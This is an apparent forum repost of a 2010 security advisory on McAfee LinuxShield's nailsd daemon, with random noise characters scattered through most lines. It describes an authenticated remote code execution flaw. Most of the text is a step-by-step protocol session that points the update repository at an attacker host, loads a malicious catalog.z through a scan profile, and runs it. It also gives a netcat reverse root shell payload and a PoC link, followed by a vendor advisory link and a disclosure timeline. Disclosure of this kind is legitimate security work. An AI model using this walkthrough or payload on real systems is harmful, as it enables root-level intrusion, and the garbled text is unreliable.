    4 V% e3 {+ z" J4 ?0 s! n% oLinuxShield installations can be centrally controlled by ePolicy
    # i4 t/ f6 F2 iOrchestrator.5 z: F, j" e0 X9 U

    4 j3 r( g. W. ]) W+ T(Product description from LinuxShield Product Guide)# _4 I* t# a# Q9 @2 T% O
    5 W% ~$ I# H, k) \7 r
    ) Z/ a: A" K4 ]+ ~6 z1 d9 @

    2 S( h  b* J9 E# t% x* P2 YDescription:
    5 P. G, H( h. z1 Z, X% P============
    $ y5 v, ~  j9 M- `+ C8 J* E1 j, u% S5 a( U
    This vulnerability allows remote attackers to execute arbitrary code
    6 g& G- I* f; D# E; M8 mon vulnerable installations of McAfee LinuxShield. User interaction8 s, H$ x- |( {; }8 \- ?
    is not required to exploit this vulnerability but an attacker must
    " z$ K# I3 |* Q5 S; W% |be authenticated.
    ; {7 E/ ?( n0 c5 }& u- _7 C8 D- l1 s( c, [! G
    The LinuxShield Webinterface communicates with the localy installed8 X( `7 ]! d1 D+ F6 V5 l
    "nailsd" daemon, which listens on port 65443/tcp, to do: [& ^0 ?" m0 X  @( U6 N
    configuration
    6 X7 Q! Z1 K  a" R/ L2 R; Wchanges, query the configuration and execute tasks.
    # l' w. l2 q2 B( D; a% J
    4 `( K( @3 V3 ^Each user, which can login to the victim box, can also authenticate
    2 a2 Z# V% t4 G0 _- _it self to the "nailsd" and can do configuration changes and) d, H" N8 p; n7 x* j- b# L3 o, l5 u
    execute
    8 ?9 f+ J' A2 e, wtasks with root privileges.
      B: p: p1 G  x' d
    # r# D' @7 O0 \* D3 Z! r1 h/ [A direct execution of commands is not possible, but it is possible to
    8 b% z5 N2 X2 y; c) cdownload and execute code through manipulation of the config and
    . Z2 H2 p3 }2 T  G6 [7 U5 oexecute schedule tasks of the LinuxShield.
    ) g8 G0 L' E  L7 \8 A. Z% _8 e, s6 T& e. f* E1 [9 v7 F, d

    7 V  W3 _, c6 }. C7 Xwalk-through (after the TLS handshake):' k; ], d$ E5 [- B8 N6 @
    +--------------------------------------
    - C" _  N% R$ G4 g8 T) ?
    : c) G) e6 L" S" }$ g6 b4 Z) Znailsd > +OK welcome to the NAILS Statistics Service& U# I; j" S$ H2 c; |3 {: T
    attacker> auth <user> <pass>
    4 z: Z/ p6 n+ q5 d2 g' [nailsd > +OK successful authentication4 a$ a; @9 w4 n' s5 ^

    : W* w: I' o! H8 H1 G# Set the Attacker repository to download our code from a httpd
    % [6 H2 [! @$ ~+ i& ?6 |5 N# (catalog.z)
    3 ~- b1 S5 g6 o5 m6 h! l#---------------------------------------------------------------
      x, L! V* ?3 O. K) T7 {# `attacker> db set 1 _table=repository status=1 siteList=<?xml version
    ! F; a( V+ Q7 \="1.0" encoding="UTF-8"?><ns:SiteLists
    . z' Y7 ^6 t, Wxmlns:ns="naSiteLi
      X/ K# \" ]) V: Gst" GlobalVersion="20030131003110"
    6 f0 `! p* e, {1 m. nLocalVersion="20091209
    ; p* E9 M; G6 U. x' Q% @: }5 y9 a161903" Type="Client"><SiteList, e/ S% J( n" O4 L9 m
    Default="1" Name="SomeGU
    0 U! J" w! h. N- ?% yID"><HttpSite Type="repository"
    ( j5 h# J* l. S# l/ RName="EvilRepo" Order="1
    ) _. \! X4 [9 B" Server="<attackerhost>:80"7 f' i9 B$ ]* v+ B# ^
    Enabled="1" Local="1"><Rela1 X6 x/ t+ X0 z# H0 e' l& f3 Y4 c
    8 ~- w9 T7 i  K" o; e
    tivePath>nai</RelativePath><UseAuth>0</UseAuth><Use5 a( Z# g+ |1 u/ W- R
    rName></
    1 r2 _" S3 o9 k9 ~: n" }) gUserName><Password& U) @9 m# c0 ]: |
    Encrypted="0"/></HttpSite></SiteList></
    4 q  c) h/ ^' `$ X3 T: pns:SiteLists> _cmd=update' g. G$ c8 R8 k8 b8 `. W: E$ r9 J) ^
    nailsd > +OK database changes buffered.
    - O* n2 S2 H9 ]$ V0 M* r9 W
    ; H8 R7 K' X/ `# `; k% w# Execute task to set the attacker repository" y& c* B6 Y7 w6 O
    #---------------------------------------------------------------
    ) F: F" T' D2 T- Gattacker> task setsitelist8 R+ ]4 l( z/ }$ K
    nailsd > +OK setting sitelist from CMA.
    * q1 ~) z* b" G7 f3 z
    % |: h# y# u8 H% n0 Q, W* z# Execute the default Update task to download the code5 g9 p2 O' H) u, f* s1 J2 e
    #---------------------------------------------------------------
    3 G* X% k$ k# U  b5 Yattacker> task nstart LinuxShield Update3 Z# L& A2 m7 ^) f
    nailsd > +OK task LinuxShield Update starting, j0 R* ?& t# H8 ]# N/ r2 I

    . w) V$ M( r( \9 X9 O) G( ^3 l# Create a Scan profile, which executes our code. The profiles are% v- l2 C1 X9 i7 s+ O
    # not stored in the database.$ X7 Y0 a6 x8 A) B8 G4 [
    # Scan Profiles: /var/opt/NAI/LinuxShield/etc/ods.cfg
    % y/ @! V* N- ?' k1 n#---------------------------------------------------------------
    % J2 _; y2 X. S1 B! O6 `* U6 Uattacker> sconf ODS_99 begin3 a+ F1 q& M  `$ }: `! q
    nailsd > +OK 1260400888( x" `0 o: {9 j9 b# w8 e  ]1 A
    " [9 D+ o4 m" S9 n7 a# l
    # Set the variable "nailsd.profile.ODS_99.scannerPath" to the
    0 t4 `* c6 [# e5 R% [6 y* v( T8 Npath
    ; P% c& v) f- U' Q9 @9 A# where our earlier downloaded catalog.z file is stored.5 k0 ?4 |7 [% s! _
    # (/opt/McAfee/cma/scratch/update/catalog.z)8 v$ T, K$ L& B4 |$ H9 V* n8 L
    #---------------------------------------------------------------" W+ }' u: W' E1 b  U
    attacker> sconf ODS_99 set 1260400888 nailsd.profile.ODS_99.allFiles=; O5 h3 ^5 ?- T6 \! [% p
    true nailsd.profile.ODS_99.childInitTmo=60 nailsd.profile.O
    3 Z3 {5 Q4 b5 t) [0 dDS_99.cleanChildren=2 nailsd.profile.ODS_99.cleansPerChild=8 E( K7 s& H' L' w9 L$ n
    10000 nailsd.profile.ODS_5.datPath=/opt/NAI/LinuxShield/eng
    & K# J# q& b7 ~! r5 p+ n# L; K" zine/dat nailsd.profile.ODS_99.decompArchive=true nailsd.pro; Q8 |. j# G% O  M
    file.ODS_99.decompExe=true nailsd.profile.ODS_99.engineLibD; G% E6 ~# |$ }4 z+ y
    ir=/opt/NAI/LinuxShield/engine/lib nailsd.profile.ODS_99.en
    ( z& _; q' S3 _% P: R! UginePath=/opt/NAI/LinuxShield/engine/lib/liblnxfv.so nailsd
    + q, d4 M, w/ A7 P+ `.profile.ODS_99.factoryInitTmo=60 nailsd.profile.ODS_99.heu- h" ^/ w* P% `3 y3 k) p( h+ w4 O
    risticAnalysis=true nailsd.profile.ODS_99.macroAnalysis=tru5 Z3 y( e% w4 D# {" x+ `0 C
    e nailsd.profile.ODS_99.maxQueSize=32 nailsd.profile.ODS_99/ p: A9 p! h* m: |6 ]/ _. i% N
    .mime=true nailsd.profile.ODS_99.noJokes=false nailsd.profi0 _% j, x8 j" p. Z
    le.ODS_99.program=true nailsd.profile.ODS_99.quarantineChil
    5 F! L7 g1 e5 A7 a5 Cdren=1 nailsd.profile.ODS_99.quarantineDirectory=/quarantin) f9 ^0 o. Y4 R. h
    e nailsd.profile.ODS_99.quarantinesPerChild=10000 nailsd.pr' O6 s9 y9 G8 y) f- K
    ofile.ODS_99.scanChildren=2 nailsd.profile.ODS_99.scanMaxTm1 W! a* @7 R2 b5 k1 ?) D
    o=301 nailsd.profile.ODS_99.scanNWFiles=true nailsd.profile+ m/ S' }* G. d
    .ODS_99.scanOnRead=true nailsd.profile.ODS_99.scanOnWrite=t
    9 E5 A: }1 r( T$ z9 C- t8 t2 o) Qrue nailsd.profile.ODS_99.scannerPath=/opt/McAfee/cma/scrat
    9 @0 A, E& N# Q( n9 vch/update/catalog.z nailsd.profile.ODS_99.scansPerChild=100
    ' N, ?1 k- a3 H. j2 g7 L6 k00 nailsd.profile.ODS_99.slowScanChildren=0 nailsd.profile.
    ; n, S8 K+ S+ [# P* LODS_99.filter.0.type=exclude-path nailsd.profile.ODS_99.fil
    7 `6 Q. P2 v/ [3 Rter.0.path=/proc nailsd.profile.ODS_99.filter.0.subdir=true
    + a( q5 e8 B. `0 Y( P! C# l6 ^nailsd.profile.ODS_99.filter.extensions.mode=all nailsd.pr
    ( ]$ u% P+ Y3 s. J! B8 M& w/ P7 f$ Xofile.ODS_99.filter.extensions.type=extension nailsd.profil
    ) _3 h5 o& O4 y& N; Te.ODS_99.action.Default.primary=Clean nailsd.profile.ODS_991 l! a$ ?5 R( C
    .action.Default.secondary=Quarantine nailsd.profile.ODS_99.1 t; ]% a: l) T* L. J2 |7 S9 a
    action.App.primary=Clean nailsd.profile.ODS_99.action.App.s3 q" H9 @3 M+ Q7 @4 h6 t/ S8 O
    econdary=Quarantine nailsd.profile.ODS_99.action.timeout=Pa7 S2 y( Q( r  p$ [, W
    ss nailsd.profile.ODS_99.action.error=Block
    5 ?+ N/ |$ }0 w* _1 Vnailsd > +OK configuration changes buffered
    6 k$ z/ H' G! A2 O  lattacker> sconf ODS_99 commit 1260400888( ?7 d% C- R2 G& F1 Z3 c2 M/ A
    nailsd > +OK configuration changes stored
    ; F' J7 v, V3 z0 p1 D4 d
    ' c# X) C6 v: Y9 ?# Set a scan task with the manipulated profile to execute the code) r1 h& L7 ^. h4 e' c) d3 i
    #---------------------------------------------------------------
    $ R) J6 g" w) \/ k' Pattacker> db set 1260400888 _table=schedule taskName=Evil Task taskTy( H- T% I" n! N8 t0 @) V/ p
    pe=On-Demand taskInfo=profileName=ODS_99,paths=path:/root/t
    3 j" i9 |, C* Kmp;exclude:false timetable=type=unscheduled taskResults=0 i
    " }/ o6 i# |) k: y. K& B( Q_lastRun=1260318482 status=Stopped _cmd=insert
    . t5 k* [+ ~: d, J0 L) Q$ q5 o0 V6 _4 Hnailsd > +OK database changes buffered
    # g5 ]( g% d7 C7 W' I4 W! t* y$ i& p& ~0 L4 n3 ~
    # Execute scan task to execute the code
    ' S% e, J6 g" R  T  I: _#---------------------------------------------------------------
      q! @2 w# i+ r- U& Gattacker> task nstart Evil Task
    ) ]) T' Q: @% R4 D- J+ e# b. P2 I1 _  Q2 j! ?/ A$ x
    +-------------------------------------- walk-through EOF
    ' t8 x# G) s6 V5 [8 x. ^% Z1 G' B2 Y7 J. B  @( ]
    1 `# G- Z# O1 ~: x2 L& W
    To get a reverse root shell place something like this in the catalog.z
    5 J0 }5 k- N4 w
    3 ^5 h- g6 h: `6 p7 ?- H7 ~--- snip ---
    " l, g- y+ I- B- D9 A$ a1 @. K" }#!/bin/sh
    8 h2 F6 H& J* t" Y: Znc -nv <attacker_host> 4444 -e /bin/sh8 l; n, }% L. |& x! x. K2 u1 m6 X
    --- /snip ---
    ) s( a; k5 z& ?5 J
    $ Q" R3 U! i' N9 m' U$ D0 P( w" F+ Y9 ]% M9 H1 z# j5 Z

      [& \! |1 ^) K% pProof of Concept :, \- Y8 w. L% u( f; m' ?
    ==================- A, ]0 A4 o+ u) ?- k) q
    9 @- Z1 R8 ^7 l, J" D
    http://inj3ct0r.com/sploits/11165.tar.gz/ @+ E$ G' |3 R& S* k  M

    / x4 Q  w( y7 b4 D; r9 I' ^$ h6 v" ^
    & Y! m1 R( @0 b% ~
    $ `0 L+ f- o2 b# g9 O: V$ \0 }Solution:
    ( n1 \- u4 d& l) X8 a=========# I! T/ r! o: i: e; d, c  l  _

    3 Y. k! Y1 L( q! x5 W( |5 UMcAfee Advisory
    0 H- I0 O% v8 J: ~+--------------
    6 @: Y: d8 `3 b+ b% U) z7 jhttps://kc.mcafee.com/corporate/index?page=content&amp;id=SB10007
    1 H4 x' L, D$ L" S0 X$ \' ]3 ?9 o- _6 \9 R5 r0 f) I$ |+ h

    ; D" _* f9 O* `2 l; N  t$ d) ~. N+ c
    2 A, `, l. x2 \' t: A% v4 qDisclosure Timeline (YYYY/MM/DD):8 N6 W; b# Z" ]5 x
    =================================
    8 q' H+ E( B8 [5 \1 N; p
    ; c, j4 J. ]* E6 v8 K6 Y4 L2009.12.07: Vulnerability found
    & h3 r9 C0 H! Z; Z, v4 w2010.02.03: Asked vendor for a PGP key
    " i! {1 m4 O8 t5 w3 e: h2010.02.05: Vendor sent his PGP key
    ! [6 k1 R% X3 j, p  Q2010.02.05: Sent PoC, Advisory, Disclosure policy and planned disclosure
    ; g( {. M' Z) _7 a5 t  Zdate (2010.02.18) to Vendor
    * s! u) W* a1 {  T5 o! e" k5 j2010.02.05: Vendor acknowledges the reception of the advisory+ a4 h8 F3 [3 u$ n' |! p8 u
    2010.02.16: Ask for a status update, because the planned release date is: `+ N) W5 R& e' F& u0 n
    2010.02.18.
    1 {" }. [( {7 c9 A* V0 _/ ^2010.02.16: Vendor response that, they are currently working on a patch3 l% A! B! N. ~$ Z6 b
    2010.02.17: Changed release date to 2010.02.25.0 B# }  g* W# ~" Z) k
    2010.02.22: Vendor gives a status update, that they are able to release
    3 c" e# g: A) T; `the patch on 2010.02.25.* i; \' H; Q9 W* g; P! v/ D% S0 e
    2010.02.24: Ask for a list of affected products and the advisory url.
    4 Y% t2 C( ^% h- [$ }2010.02.24: Vendor sends the list.
    1 ]0 e& r3 A9 u! d% `$ m2010.03.02: Release of this Advisory6 l8 m4 [5 ^7 f" G; a0 I( m$ q

    - f9 K- Z& N6 ~9 k  [0 d/ |& @. v- L7 K& ?

    % y" c! s' g5 H) ~
    + U. o* }5 e- b/ i* X9 @# Z
    3 U0 P  d- u  u/ c) x
      p/ f0 P. s( f" N+ Q! n& H6 r: y* g2 m" B* }& k3 q: n! x
    8 D! k3 L6 @  n

    % }9 O0 _+ v, X' r) r! m0 M0 g9 _& l9 c& z6 u7 P

    . O2 R+ f# I2 t) e- _( C) s# M( c1 Q$ Q! q, U
    2 X; f+ @0 Y+ p% c' n

    ; X) j: k5 j% `) |/ |/ K, i+ w' f& G0 o6 b5 Z/ H$ }

    ' C( H5 U; ^. D$ ], V& C- t* L
    & i; K, m4 e$ P& u! N. E& r" f6 g( }
    ) [( {9 s% M$ y2 S

    7 Q, s+ u8 t$ H: L6 t9 W8 G; j4 n* m$ V% {( K
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    返回列表